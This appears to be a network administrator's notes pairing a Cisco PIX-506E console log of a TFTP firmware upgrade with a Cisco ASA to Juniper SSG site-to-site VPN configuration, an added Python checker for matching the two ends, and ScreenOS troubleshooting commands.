00 07 02 8086 7112 Serial Bus 9
00 07 03 8086 7113 PCI Bridge
00 0D 00 8086 1209 Ethernet 11
00 0E 00 8086 1209 Ethernet 10

Cisco Secure PIX Firewall BIOS (4.2) #0: Mon Dec 31 08:34:35 PST 2001
Platform PIX-506E
System Flash=E28F640J3 @ 0xfff00000

Use BREAK or ESC to interrupt flash boot.
Use SPACE to begin flash boot immediately.
[Hit ESC]
Flash boot interrupted.
0: i8255X @ PCI(bus:0 dev:14 irq:10)
1: i8255X @ PCI(bus:0 dev:13 irq:11)

Using 1: i82557 @ PCI(bus:0 dev:13 irq:11), MAC: 001a.a2a4.5c33
Use ? for help.
monitor> address 192.168.5.2
address 192.168.5.2
monitor> server 192.168.5.1
server 192.168.5.1
monitor> file pix712.bin
file pix712.bin
monitor> tftp
tftp [email protected]…………………………………………………………………….
Received 6764544 bytes

Cisco PIX Security Appliance admin loader (3.0) #0: Tue Mar 14 16:46:07 PST 2006
#############################################################
64MB RAM

Total NICs found: 2
mcwa i82559 Ethernet at irq 11 MAC: 001a.a2a4.5c33
mcwa i82559 Ethernet at irq 10 MAC: 001a.a2a4.5c32
BIOS Flash=am29f400b @ 0xd8000
Old file system detected. Attempting to save data in flash

Initializing flashfs…
flashfs[7]: Checking block 0…block number was (-2131)
flashfs[7]: erasing block 0…done.
flashfs[7]: Checking block 1…block number was (-12656)
flashfs[7]: erasing block 1…done.
flashfs[7]: Checking block 2…block number was (-31472)
flashfs[7]: erasing block 2…done.
flashfs[7]: Checking block 3…block number was (32183)
flashfs[7]: erasing block 3…done.
flashfs[7]: Checking block 4…block number was (27050)
flashfs[7]: erasing block 4…done.
flashfs[7]: Checking block 5…block number was (10385)
flashfs[7]: erasing block 5…done.
flashfs[7]: Checking block 6…block number was (27686)
flashfs[7]: erasing block 6…done.
flashfs[7]: Checking block 7…block number was (1814)
flashfs[7]: erasing block 7…done.
flashfs[7]: Checking block 8…block number was (22750)
flashfs[7]: erasing block 8…done.
flashfs[7]: Checking block 9…block number was (11436)
flashfs[7]: erasing block 9…done.
flashfs[7]: Checking block 10…block number was (10399)
flashfs[7]: erasing block 10…done.
flashfs[7]: Checking block 11…block number was (-4384)
flashfs[7]: erasing block 11…done.
flashfs[7]: Checking block 12…block number was (10801)
flashfs[7]: erasing block 12…done.
flashfs[7]: Checking block 13…block number was (3939)
flashfs[7]: erasing block 13…done.
flashfs[7]: Checking block 14…block number was (29271)
flashfs[7]: erasing block 14…done.
flashfs[7]: Checking block 15…block number was (3)
flashfs[7]: erasing block 15…done.
flashfs[7]: Checking block 16…block number was (-12561)
flashfs[7]: erasing block 16…done.
flashfs[7]: Checking block 17…block number was (-17835)
flashfs[7]: erasing block 17…done.
flashfs[7]: Checking block 18…block number was (25075)
flashfs[7]: erasing block 18…done.
flashfs[7]: Checking block 19…block number was (18017)
flashfs[7]: erasing block 19…done.
flashfs[7]: Checking block 20…block number was (21479)
flashfs[7]: erasing block 20…done.
flashfs[7]: Checking block 21…block number was (-3643)
flashfs[7]: erasing block 21…done.
flashfs[7]: Checking block 22…block number was (-18350)
flashfs[7]: erasing block 22…done.
flashfs[7]: Checking block 23…block number was (25412)
flashfs[7]: erasing block 23…done.
flashfs[7]: Checking block 24…block number was (8285)
flashfs[7]: erasing block 24…done.
flashfs[7]: Checking block 25…block number was (-11600)
flashfs[7]: erasing block 25…done.
flashfs[7]: Checking block 26…block number was (-32046)
flashfs[7]: erasing block 26…done.
flashfs[7]: Checking block 27…block number was (1769)
flashfs[7]: erasing block 27…done.
flashfs[7]: Checking block 28…block number was (-28376)
flashfs[7]: erasing block 28…done.
flashfs[7]: Checking block 29…block number was (-19639)
flashfs[7]: erasing block 29…done.
flashfs[7]: Checking block 30…block number was (-20657)
flashfs[7]: erasing block 30…done.
flashfs[7]: Checking block 31…block number was (3744)
flashfs[7]: erasing block 31…done.
flashfs[7]: Checking block 32…block number was (-11933)
flashfs[7]: erasing block 32…done.
flashfs[7]: Checking block 33…block number was (17275)
flashfs[7]: erasing block 33…done.
flashfs[7]: Checking block 34…block number was (23299)
flashfs[7]: erasing block 34…done.
flashfs[7]: Checking block 35…block number was (-13460)
flashfs[7]: erasing block 35…done.
flashfs[7]: Checking block 36…block number was (10511)
flashfs[7]: erasing block 36…done.
flashfs[7]: Checking block 37…block number was (-10457)
flashfs[7]: erasing block 37…done.
flashfs[7]: Checking block 38…block number was (30155)
flashfs[7]: erasing block 38…done.
flashfs[7]: Checking block 39…block number was (7950)
flashfs[7]: erasing block 39…done.
flashfs[7]: Checking block 40…block number was (-13108)
flashfs[7]: erasing block 40…done.
flashfs[7]: Checking block 41…block number was (-13108)
flashfs[7]: erasing block 41…done.
flashfs[7]: Checking block 42…block number was (-13108)
flashfs[7]: erasing block 42…done.
flashfs[7]: Checking block 43…block number was (-13108)
flashfs[7]: erasing block 43…done.
flashfs[7]: Checking block 44…block number was (-13108)
flashfs[7]: erasing block 44…done.
flashfs[7]: Checking block 45…block number was (-13108)
flashfs[7]: erasing block 45…done.
flashfs[7]: Checking block 46…block number was (-13108)
flashfs[7]: erasing block 46…done.
flashfs[7]: Checking block 47…block number was (-13108)
flashfs[7]: erasing block 47…done.
flashfs[7]: Checking block 48…block number was (-13108)
flashfs[7]: erasing block 48…done.
flashfs[7]: Checking block 49…block number was (-13108)
flashfs[7]: erasing block 49…done.
flashfs[7]: Checking block 50…block number was (-13108)
flashfs[7]: erasing block 50…done.
flashfs[7]: Checking block 51…block number was (-13108)
flashfs[7]: erasing block 51…done.
flashfs[7]: Checking block 52…block number was (-13108)
flashfs[7]: erasing block 52…done.
flashfs[7]: Checking block 53…block number was (-13108)
flashfs[7]: erasing block 53…done.
flashfs[7]: Checking block 54…block number was (-13108)
flashfs[7]: erasing block 54…done.
flashfs[7]: Checking block 55…block number was (-13108)
flashfs[7]: erasing block 55…done.
flashfs[7]: Checking block 56…block number was (-13108)
flashfs[7]: erasing block 56…done.
flashfs[7]: Checking block 57…block number was (-13108)
flashfs[7]: erasing block 57…done.
flashfs[7]: Checking block 58…block number was (-13108)
flashfs[7]: erasing block 58…done.
flashfs[7]: Checking block 59…block number was (-13108)
flashfs[7]: erasing block 59…done.
flashfs[7]: Checking block 60…block number was (-13108)
flashfs[7]: erasing block 60…done.
flashfs[7]: Checking block 61…block number was (0)
flashfs[7]: erasing block 61…done.
flashfs[7]: 0 files, 1 directories
flashfs[7]: 0 orphaned files, 0 orphaned directories
flashfs[7]: Total bytes: 7870464
flashfs[7]: Bytes used: 1024
flashfs[7]: Bytes available: 7869440
flashfs[7]: flashfs fsck took 53 seconds.
flashfs[7]: Initialization complete.

Saving the configuration
!
Saving a copy of old configuration as downgrade.cfg
!
Saved the activation key from the flash image
Saved the default firewall mode (single) to flash
The version of image file in flash is not bootable in the current version of
software.
Use the downgrade command first to boot older version of software.
The file is being saved as image_old.bin anyway.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Upgrade process complete
Need to burn loader….
Erasing sector 0…[OK]
Burning sector 0…[OK]

Licensed features for this platform:
Maximum Physical Interfaces : 2
Maximum VLANs : 2
Inside Hosts : Unlimited
Failover : Not supported
VPN-DES : Enabled
VPN-3DES-AES : Enabled
Cut-through Proxy : Enabled
Guards : Enabled
URL Filtering : Enabled
Security Contexts : 0
GTP/GPRS : Disabled
VPN Peers : Unlimited

This platform does not support Failover.

————————————————————————–
. .
| |
||| |||
.|| ||. .|| ||.
.:||| | |||:..:||| | |||:.
C i s c o S y s t e m s
————————————————————————–

Cisco PIX Security Appliance Software Version 7.1(2)

****************************** Warning *******************************
This product contains cryptographic features and is
subject to United States and local country laws
governing, import, export, transfer, and use.
Delivery of Cisco cryptographic products does not
imply third-party authority to import, export,
distribute, or use encryption. Importers, exporters,
distributors and users are responsible for compliance
with U.S. and local country laws. By using this
product you agree to comply with applicable laws and
regulations. If you are unable to comply with U.S.
and local laws, return the enclosed items immediately.

A summary of U.S. laws governing Cisco cryptographic
products may be found at:

http://www.cisco.com/wwl/export/crypto/tool/stqrg.html

If you require further assistance please contact us by
sending email to export@cisco.com
******************************* Warning *******************************

Copyright (c) 1996-2006 by Cisco Systems, Inc.

Restricted Rights Legend

Use, duplication, or disclosure by the Government is
subject to restrictions as set forth in subparagraph
(c) of the Commercial Computer Software – Restricted
Rights clause at FAR sec. 52.227-19 and subparagraph
(c) (1) (ii) of the Rights in Technical Data and Computer
Software clause at DFARS sec. 252.227-7013.

Cisco Systems, Inc.
170 West Tasman Drive
San Jose, California 95134-1706

timeout sip-disconnect 0:02:00 sip-invite 0:03:00
^
ERROR: % Invalid input detected at '^' marker.
*** Output from config line 40, "timeout sip-disconnect 0..."
ERROR: This command is no longer needed. The LOCAL user database is always enabled.
*** Output from config line 48, "aaa-server LOCAL protoco..."
ERROR: This command is no longer needed. The 'floodguard' feature is always enabled.
*** Output from config line 55, "floodguard enable"

Cryptochecksum (unchanged): 5ca481c6 1487c90e c50ead2b a3088231
INFO: converting 'fixup protocol dns maximum-length 512' to MPF commands
INFO: converting 'fixup protocol ftp 21' to MPF commands
INFO: converting 'fixup protocol h323_h225 1720' to MPF commands
INFO: converting 'fixup protocol h323_ras 1718-1719' to MPF commands
INFO: converting 'fixup protocol http 80' to MPF commands
INFO: converting 'fixup protocol netbios 137-138' to MPF commands
INFO: converting 'fixup protocol rsh 514' to MPF commands
INFO: converting 'fixup protocol rtsp 554' to MPF commands
INFO: converting 'fixup protocol sip 5060' to MPF commands
INFO: converting 'fixup protocol skinny 2000' to MPF commands
INFO: converting 'fixup protocol smtp 25' to MPF commands
INFO: converting 'fixup protocol sqlnet 1521' to MPF commands
INFO: converting 'fixup protocol sunrpc_udp 111' to MPF commands
INFO: converting 'fixup protocol tftp 69' to MPF commands
INFO: converting 'fixup protocol sip udp 5060' to MPF commands
INFO: converting 'fixup protocol xdmcp 177' to MPF commands
************************************************************************
** **
** *** WARNING *** WARNING *** WARNING *** WARNING *** WARNING *** **
** **
** ----> Current image running from RAM only!
en
Password:
pixfirewall# sh ver

Cisco PIX Security Appliance Software Version 7.1(2)

Compiled on Tue 14-Mar-06 17:00 by dalecki
System image file is "Unknown, monitor mode tftp booted image"
Config file at boot was "startup-config"

pixfirewall up 15 secs

Hardware: PIX-506E, 64 MB RAM, CPU Pentium II 300 MHz
Flash E28F640J3 @ 0xfff00000, 8MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB

0: Ext: Ethernet0 : address is 001a.a2a4.5c32, irq 10
1: Ext: Ethernet1 : address is 001a.a2a4.5c33, irq 11

Licensed features for this platform:
Maximum Physical Interfaces : 2
Maximum VLANs : 2
Inside Hosts : Unlimited
Failover : Not supported
VPN-DES : Enabled
VPN-3DES-AES : Enabled
Cut-through Proxy : Enabled
Guards : Enabled
pixfirewall# sh flash

Directory of flash:/

4 -rw- 1830 16:23:18 Aug 04 2012 downgrade.cfg
7 -rw- 1978424 16:23:34 Aug 04 2012 image_old.bin

7870464 bytes total (5884928 bytes free)
pixfirewall# delete downgrade.cfg

Delete filename [downgrade.cfg]?

Delete flash:/downgrade.cfg? [confirm]

pixfirewall# delete image_old.bin

Delete filename [image_old.bin]?

Delete flash:/image_old.bin? [confirm]

pixfirewall# sh ip
System IP Addresses:
Interface Name IP address Subnet mask Method
Ethernet1 inside 192.168.5.2 255.255.255.0 CONFIG
Current IP Addresses:
Interface Name IP address Subnet mask Method
Ethernet1 inside 192.168.5.2 255.255.255.0 CONFIG
pixfirewall# copy tftp://192.168.5.1/pix712.bin flash

Address or name of remote host [192.168.5.1]?

Source filename [pix712.bin]?

Destination filename [pix712.bin]?

Accessing tftp://192.168.5.1/pix712.bin…!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Writing file flash:/pix712.bin…
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

6764544 bytes copied in 72.900 secs (93952 bytes/sec)
pixfirewall# sh flash

Directory of flash:/

4 -rw- 6764544 16:29:38 Aug 04 2012 pix712.bin

7870464 bytes total (1101312 bytes free)
pixfirewall# show run | i boot
pixfirewall# config t
pixfirewall(config)# boot system pix712.bin
INFO: Converting pix712.bin to flash:/pix712.bin
pixfirewall(config)# exit
pixfirewall# wr mem
Building configuration…
Cryptochecksum: 1c4473b8 dc713c6f 0b1336b3 b45dea54

1765 bytes copied in 0.430 secs
[OK]
pixfirewall# show run | i boot
boot system flash:/pix712.bin
pixfirewall# reload
Proceed with reload? [confirm]
pixfirewall#

***
*** --- START GRACEFUL SHUTDOWN ---
Shutting down isakmp
Shutting down File system

***
*** --- SHUTDOWN NOW ---

Rebooting….

CISCO SYSTEMS PIX FIREWALL
Embedded BIOS Version 4.3.207 01/02/02 16:12:22.73
Compiled by morlee
64 MB RAM

PCI Device Table.
Bus Dev Func VendID DevID Class Irq
00 00 00 8086 7192 Host Bridge
00 07 00 8086 7110 ISA Bridge
00 07 01 8086 7111 IDE Controller
00 07 02 8086 7112 Serial Bus 9
00 07 03 8086 7113 PCI Bridge
00 0D 00 8086 1209 Ethernet 11
00 0E 00 8086 1209 Ethernet 10

Cisco Secure PIX Firewall BIOS (4.2) #0: Mon Dec 31 08:34:35 PST 2001
Platform PIX-506E
System Flash=E28F640J3 @ 0xfff00000

Use BREAK or ESC to interrupt flash boot.
Use SPACE to begin flash boot immediately.
Reading 123392 bytes of image from flash.

PIX Flash Load Helper

Initializing flashfs…
flashfs[0]: 6 files, 3 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 7870464
flashfs[0]: Bytes used: 6770176
flashfs[0]: Bytes available: 1100288
flashfs[0]: Initialization complete.

Reading image flash:/pix712.bin
Launching image flash:/pix712.bin
###############################################

64MB RAM

Total NICs found: 2
mcwa i82559 Ethernet at irq 11 MAC: 001a.a2a4.5c33
mcwa i82559 Ethernet at irq 10 MAC: 001a.a2a4.5c32
BIOS Flash=am29f400b @ 0xd8000

Initializing flashfs…
flashfs[7]: 6 files, 3 directories
flashfs[7]: 0 orphaned files, 0 orphaned directories
flashfs[7]: Total bytes: 7870464
flashfs[7]: Bytes used: 6770176
flashfs[7]: Bytes available: 1100288
flashfs[7]: flashfs fsck took 9 seconds.
flashfs[7]: Initialization complete.

Need to burn loader….
Erasing sector 0…[OK]
Burning sector 0…[OK]

Licensed features for this platform:
Maximum Physical Interfaces : 2
Maximum VLANs : 2
Inside Hosts : Unlimited
Failover : Not supported
VPN-DES : Enabled
VPN-3DES-AES : Enabled
Cut-through Proxy : Enabled
Guards : Enabled
URL Filtering : Enabled
Security Contexts : 0
GTP/GPRS : Disabled
VPN Peers : Unlimited

This platform does not support Failover.

————————————————————————–
. .
| |
||| |||
.|| ||. .|| ||.
.:||| | |||:..:||| | |||:.
C i s c o S y s t e m s
————————————————————————–

Cisco PIX Security Appliance Software Version 7.1(2)

****************************** Warning *******************************
This product contains cryptographic features and is
subject to United States and local country laws
governing, import, export, transfer, and use.
Delivery of Cisco cryptographic products does not
imply third-party authority to import, export,
distribute, or use encryption. Importers, exporters,
distributors and users are responsible for compliance
with U.S. and local country laws. By using this
product you agree to comply with applicable laws and
regulations. If you are unable to comply with U.S.
and local laws, return the enclosed items immediately.

A summary of U.S. laws governing Cisco cryptographic
products may be found at:

http://www.cisco.com/wwl/export/crypto/tool/stqrg.html

If you require further assistance please contact us by
sending email to export@cisco.com
******************************* Warning *******************************

Copyright (c) 1996-2006 by Cisco Systems, Inc.

Restricted Rights Legend

Use, duplication, or disclosure by the Government is
subject to restrictions as set forth in subparagraph
(c) of the Commercial Computer Software – Restricted
Rights clause at FAR sec. 52.227-19 and subparagraph
(c) (1) (ii) of the Rights in Technical Data and Computer
Software clause at DFARS sec. 252.227-7013.

Cisco Systems, Inc.
170 West Tasman Drive
San Jose, California 95134-1706

Cryptochecksum (unchanged): 1c4473b8 dc713c6f 0b1336b3 b45dea54
Type help or '?' for a list of available commands.
pixfirewall> sh ver

Cisco PIX Security Appliance Software Version 7.1(2)

Compiled on Tue 14-Mar-06 17:00 by dalecki
System image file is "flash:/pix712.bin"
Config file at boot was "startup-config"

pixfirewall up 7 secs

Hardware: PIX-506E, 64 MB RAM, CPU Pentium II 300 MHz
Flash E28F640J3 @ 0xfff00000, 8MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB

0: Ext: Ethernet0 : address is 001a.a2a4.5c32, irq 10
1: Ext: Ethernet1 : address is 001a.a2a4.5c33, irq 11

Licensed features for this platform:
Maximum Physical Interfaces : 2
Maximum VLANs : 2
Inside Hosts : Unlimited
Failover : Not supported
VPN-DES : Enabled
VPN-3DES-AES : Enabled
Cut-through Proxy : Enabled
Guards : Enabled
pixfirewall> en
Password:
pixfirewall# sh flash

Directory of flash:/

4 -rw- 6764544 16:29:38 Aug 04 2012 pix712.bin

7870464 bytes total (1100288 bytes free)
pixfirewall#
pixfirewall#

Below is a config to create a VPN tunnel between a Cisco ASA (Blue side) and a Juniper SSG running ScreenOS (Red side).

Juniper Settings:

ethernet0/0: 22.22.22.22, Untrust
bgroup0: 172.16.22.1, Trust

[diagram]

Cisco ASA config (Blue):

!^^^^^^^ ISAKMP (Phase 1) ^^^^^^^!
! must match with the other side in order for Phase 1 to complete.
! Lower policy numbers will likely be used before higher ones.
crypto isakmp policy 5
authentication pre-share
encryption aes
hash sha
group 2
lifetime 86400

! Enable ISAKMP on the outside interface
crypto isakmp enable OUTSIDE
! Define the pre-shared-key
tunnel-group 22.22.22.22 type ipsec-l2l
tunnel-group 22.22.22.22 ipsec-attributes
pre-shared-key sekretk3y

!^^^^^^^ IPSEC (Phase 2) ^^^^^^^!
! Define the interesting traffic in the ACL
access-list ACL-RED-VPN permit ip 192.168.11.0 255.255.255.0 172.16.22.0 255.255.255.0
crypto ipsec transform-set ESP-AES128-SHA esp-aes esp-sha-hmac
! Create a crypto map entry that defines the tunnel
crypto map MAP-OUTSIDE 20 set peer 22.22.22.22
! ACL must be exactly the opposite of the other sides ACL
crypto map MAP-OUTSIDE 20 match address ACL-RED-VPN
! Transform set must match other side identically
crypto map MAP-OUTSIDE 20 set transform-set ESP-AES128-SHA
crypto map MAP-OUTSIDE 20 set security-association lifetime kilobytes 10000
! Apply crypto map to an interface
crypto map MAP-OUTSIDE interface OUTSIDE

!^^^^^^^ Routes and No-NATS ^^^^^^^!
! Point the destination network out the outside interface with a next hop as the default gateway.
route OUTSIDE 172.16.22.0 255.255.255.0 11.11.11.1
! Make sure that the VPN traffic is NOT NAT’d
access-list ACL-INSIDE-NONAT extended permit ip 192.168.11.0 255.255.255.0 172.16.22.0 255.255.255.0
nat (INSIDE) 0 access-list ACL-INSIDE-NONAT

Juniper SSG-5 ScreenOS config (Red):

# Create a tunnel interface
set interface tunnel.1 zone Untrust
set interface tunnel.1 ip unnumbered interface ethernet0/0

# Create the gateway (IKE settings)
# note that "sec-level standard" means the IKE policies will try to use: pre-g2-3des-sha and pre-g2-aes128-sha
set ike gateway "VPN-GATEWAY" ip 11.11.11.11 outgoing-interface ethernet0/0 preshare "sekretk3y" sec-level standard

# Configure VPN IPSEC settings
set vpn "VPN" gateway "VPN-GATEWAY" replay tunnel idletime 0 proposal "nopfs-esp-aes128-sha"
set vpn "VPN" id 1 bind interface tunnel.1
set vpn "VPN" proxy-id local-ip 172.16.22.0/24 remote-ip 192.168.11.0/24 "ANY"

# Configure a route for the remote end traffic
set vrouter trust-vr route 192.168.11.0/24 interface tunnel.1

# Create 2 address book entries and create two policies to permit this traffic
set address Untrust "192.168.11.0/24" 192.168.11.0/24
set address Trust "172.16.22.0/24" 172.16.22.0/24
set policy top from "Trust" to "Untrust" "172.16.22.0/24" "192.168.11.0/24" "ANY" Permit log count
set policy top from "Untrust" to "Trust" "192.168.11.0/24" "172.16.22.0/24" "ANY" Permit log count

Notes:

Coming at this from my Cisco background, I had to learn some new ways of looking at this.

The traffic that is allowed over the tunnel is called the proxy-id; it is defined in the VPN settings. You then also have to permit that traffic with a policy between the zone of your tunnel interface and the zone of whichever internal interface you use. In my case my Trust interface was bgroup0.
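The config comments above say the ACL must be the exact opposite of the other side's proxy-id and the transform set must match identically; these are the mismatches that leave Phase 2 stuck. As an added example (not code from the original post, nor from Cisco or Juniper), the following Python script parses the two fragments and checks exactly that: the ASA interesting-traffic ACL mirrors the SSG proxy-id, the ASA transform set corresponds to the ScreenOS Phase 2 proposal, and the ASA ISAKMP policy is one of the proposals `sec-level standard` tries. The equivalence tables `PHASE2_EQUIV`, `SEC_LEVEL_STANDARD` and `ASA_ENC_NAMES`, and the `SSG_CONFIG_TYPO` fragment, are assumptions constructed for the illustration; the parser only understands the single-policy, single-crypto-map shape shown on this page.

```python
"""Cross-check both ends of the ASA (Blue) <-> ScreenOS (Red) tunnel.
Added example, not code from the post or from either vendor; the fragments are
the post's own lines, the equivalence tables are assumptions for this illustration."""
import ipaddress
import re

# Blue side lines the check needs (copied from the post; one ISAKMP policy).
ASA_CONFIG = """\
crypto isakmp policy 5
 authentication pre-share
 encryption aes
 hash sha
 group 2
access-list ACL-RED-VPN permit ip 192.168.11.0 255.255.255.0 172.16.22.0 255.255.255.0
crypto ipsec transform-set ESP-AES128-SHA esp-aes esp-sha-hmac
crypto map MAP-OUTSIDE 20 set peer 22.22.22.22
crypto map MAP-OUTSIDE 20 match address ACL-RED-VPN
crypto map MAP-OUTSIDE 20 set transform-set ESP-AES128-SHA
"""
# Red side lines (copied from the post, with straight quotes).
SSG_CONFIG = """\
set ike gateway "VPN-GATEWAY" ip 11.11.11.11 outgoing-interface ethernet0/0 preshare "sekretk3y" sec-level standard
set vpn "VPN" gateway "VPN-GATEWAY" replay tunnel idletime 0 proposal "nopfs-esp-aes128-sha"
set vpn "VPN" proxy-id local-ip 172.16.22.0/24 remote-ip 192.168.11.0/24 "ANY"
"""
# Constructed mistake for the demo: the proxy-id typed with the wrong remote subnet.
SSG_CONFIG_TYPO = SSG_CONFIG.replace("remote-ip 192.168.11.0/24", "remote-ip 192.168.12.0/24")

# Assumed mapping: ASA transform-set body -> ScreenOS Phase 2 proposal name
# (the "nopfs-" family, because the ASA crypto map entry sets no pfs group).
PHASE2_EQUIV = {
    ("esp-aes", "esp-sha-hmac"): "nopfs-esp-aes128-sha",
    ("esp-3des", "esp-sha-hmac"): "nopfs-esp-3des-sha",
}
# Phase 1 proposals that "sec-level standard" tries, as stated in the post.
SEC_LEVEL_STANDARD = {"pre-g2-3des-sha", "pre-g2-aes128-sha"}
ASA_ENC_NAMES = {"aes": "aes128", "3des": "3des", "des": "des"}


def _net(addr, mask):
    # ASA writes "address netmask"; ipaddress accepts the dotted netmask form.
    return ipaddress.ip_network(f"{addr}/{mask}", strict=False)


def parse_asa(cfg):
    """Collect ACLs, transform sets, crypto map entries and the ISAKMP policy."""
    acls, tsets, cmap, policy = {}, {}, {}, {}
    for line in cfg.splitlines():
        line = line.strip()
        if m := re.match(r"access-list (\S+) (?:extended )?permit ip (\S+) (\S+) (\S+) (\S+)$", line):
            acls.setdefault(m[1], []).append((_net(m[2], m[3]), _net(m[4], m[5])))
        elif m := re.match(r"crypto ipsec transform-set (\S+) (.+)$", line):
            tsets[m[1]] = tuple(m[2].split())
        elif m := re.match(r"crypto map (\S+) (\d+) (set peer|match address|set transform-set) (\S+)$", line):
            key = {"set peer": "peer", "match address": "acl", "set transform-set": "tset"}[m[3]]
            cmap.setdefault((m[1], int(m[2])), {})[key] = m[4]
        elif m := re.match(r"(authentication|encryption|hash|group) (\S+)$", line):
            policy[m[1]] = m[2]
    return acls, tsets, cmap, policy


def parse_ssg(cfg):
    """Pull the proxy-id, Phase 2 proposal and IKE gateway out of the ScreenOS config."""
    ssg = {}
    for line in cfg.splitlines():
        line = line.strip()
        if m := re.match(r'set vpn "[^"]+" proxy-id local-ip (\S+) remote-ip (\S+)', line):
            ssg["local"] = ipaddress.ip_network(m[1], strict=False)
            ssg["remote"] = ipaddress.ip_network(m[2], strict=False)
        elif m := re.match(r'set vpn "[^"]+" gateway "([^"]+)" .*proposal "([^"]+)"', line):
            ssg["gateway"], ssg["proposal"] = m[1], m[2]
        elif m := re.match(r'set ike gateway "([^"]+)" ip (\S+) .*sec-level (\S+)', line):
            ssg["peer"], ssg["sec_level"] = m[2], m[3]
    return ssg


def check_vpn(asa_cfg, ssg_cfg):
    """Return a list of mismatches between the two ends; an empty list means they agree."""
    acls, tsets, cmap, policy = parse_asa(asa_cfg)
    ssg = parse_ssg(ssg_cfg)
    findings = []
    # Phase 1: the ASA policy must be one of the proposals the SSG will offer.
    asa_p1 = f"pre-g{policy.get('group')}-{ASA_ENC_NAMES.get(policy.get('encryption'))}-{policy.get('hash')}"
    if policy.get("authentication") != "pre-share" or (
            ssg.get("sec_level") == "standard" and asa_p1 not in SEC_LEVEL_STANDARD):
        findings.append(f"phase1: ASA policy {asa_p1} is not offered by sec-level {ssg.get('sec_level')}")
    # Phase 2: the ACL must be the exact mirror of the proxy-id (ASA source = SSG
    # remote, ASA destination = SSG local) and the transform set must match the proposal.
    mirror = {(ssg.get("remote"), ssg.get("local"))}
    for (name, seq), entry in sorted(cmap.items()):
        pairs = set(acls.get(entry.get("acl"), []))
        if pairs != mirror:
            shown = [f"{s}->{d}" for s, d in sorted(pairs, key=str)]
            findings.append(f"{name} {seq}: ACL {entry.get('acl')} {shown} is not the mirror of "
                            f"proxy-id local {ssg.get('local')} remote {ssg.get('remote')}")
        want = PHASE2_EQUIV.get(tsets.get(entry.get("tset")))
        if want != ssg.get("proposal"):
            findings.append(f"{name} {seq}: transform-set {entry.get('tset')} corresponds to "
                            f"{want}, but the SSG offers {ssg.get('proposal')}")
    return findings


if __name__ == "__main__":
    print("post config:", check_vpn(ASA_CONFIG, SSG_CONFIG) or "consistent")
    print("typo config:", check_vpn(ASA_CONFIG, SSG_CONFIG_TYPO))
```

Run it against both fragments before bringing the tunnel up: the post's own config comes back clean, while the constructed typo is reported as an ACL that does not mirror the proxy-id, which is the kind of mismatch you would otherwise be hunting for in `get event`. Peer addresses (the ASA's `set peer` against the SSG's outgoing interface address, and the SSG's gateway `ip` against the ASA's outside address) are not both present in the SSG fragment and still need to be checked by hand.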


Troubleshooting:

Some show commands to see what’s going on:

get sa

get ike gateway

get event

Try creating a packet capture to see what happens to a packet. With it you can see what is going on between the two VPN peers, or why your interesting traffic is not making it through the SSG.

clear db
set console dbuf
set ffilter src-ip 1.1.1.1 dst-ip 2.2.2.2
debug flow basic

# generate some traffic

# to see the capture:
get dbuf stream

# to stop capturing:
undebug all